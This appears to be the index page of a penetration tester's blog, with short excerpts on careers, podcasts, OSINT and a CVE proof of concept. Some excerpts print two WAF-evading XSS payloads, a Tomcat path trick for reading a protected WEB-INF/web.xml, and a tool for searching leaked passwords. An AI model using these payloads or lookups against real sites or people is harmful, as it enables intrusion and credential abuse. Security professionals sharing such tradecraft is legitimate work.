The most important thing to ask yourself if you're thinking of pursuing any of these fields is your desire to learn... Just kidding! This is a VERY common thing to hear or read in the industry... Doesn't matter how much you know walking in, just your desire to learn... This is false and bullshit. Why, you ask? …
Author: gainsec
Technique, Tool and Lecture #7
Technique: Google Dork for getting results consisting only of IP addresses. You have to include 2 octets, but then you can use * for the rest. For example, if I'm looking for data on 103.10.1.1/16 I can do site:103.10.* or site:103.10.*.* Remember, * aren't wildcards, but they are as close as you'll get. Also remember that …
So you want to be a penetration tester, security consultant, ethical hacker, red teamer or any other offensive cyber security professional? #1
This one is going to be quick, that is because I'm just linking my lecture where I go over where higher education and academia as a whole should move towards as well as provide a general overview of what it means to work professionally within offensive cyber security. Consider this my kick-off post for further …
Top 8 Podcasts For Hacking, Privacy, Cyber Security and Penetration Testing
Walk around a lot or drive a lot? Don't let that stop you from continuing your learning. Here is my list of my personal favorite podcasts that have some relevance to my role as a security consultant/penetration tester or pique my fancy as a privacy and cyber security enthusiast. The Privacy, Security, & OSINT Show …
Technique, Tool and Lecture #6
Hi Guys, Time for some more hacker's TLC, or tips and tricks for penetration testers! Anyway, here we go! Technique: 2 Incapsula WAF XSS Bypasses. I haven't had a chance to use these yet, but I do encounter Incapsula once in a while, so I'll keep them in my bag: <iframe/onload='this["src"]="javas	cript:al"+"ert``"';> <img/src=q onerror='new Function`al\ert\`1\``'> Source Tool: …
PoC for CVE-2017-16744 and CVE-2017-16748
Wow, so it's been two years or so since I found these two vulnerabilities in an Industrial Control System (ICS) while doing an external penetration test. Before we continue, if you're unsure what an ICS is, here is a link with a definition. With that out of the way, here we go! I fixed up …
Government Run People Search Tools
People search engines are all the rage at this moment in history. New ones appear online and go offline just as fast. These are the sites like thatsthem.com where you put in a first and last name and you get a list of addresses and other information. What if I told you that there are people search engines to find out where someone lives or who lives at what address, completely free and run by the government? Would you believe me?
Internet Hygiene
Internet Hygiene, or an individual's Operation Security (OpSec), is how aware and careful you are when you use the internet. Whether it be surfing the web, playing games or using social media, you are constantly leaking information. In my example today, I took a license plate from an eBay posting. Then I used a search …
Technique, Tool and Lecture #5
Technique: Quick and Easy Bypass for Tomcat 8 on Windows
https://x.x.x.x/WEB-INF/web.xml -> 403 Forbidden
https://x.x.x.x/./WEB-INF/web.xml -> 403 Forbidden
https://x.x.x.x/.//WEB-INF/web.xml -> 200 OK
Haven't had a chance to use this yet, but I'm sure I will soon. Source Tool: Karma. So awesome! Lets you search by username, domain or password. For example, I can search by …
Technique, Tool and Lecture #4
Another round of techniques, tools and lectures 😀 Technique: This time it is not so much a technique as a trove of resources! I have found many resources for books/publications relevant to my career. I'll admit, I'm much more of a fan of physical copies. That said, if you're okay with PDFs then …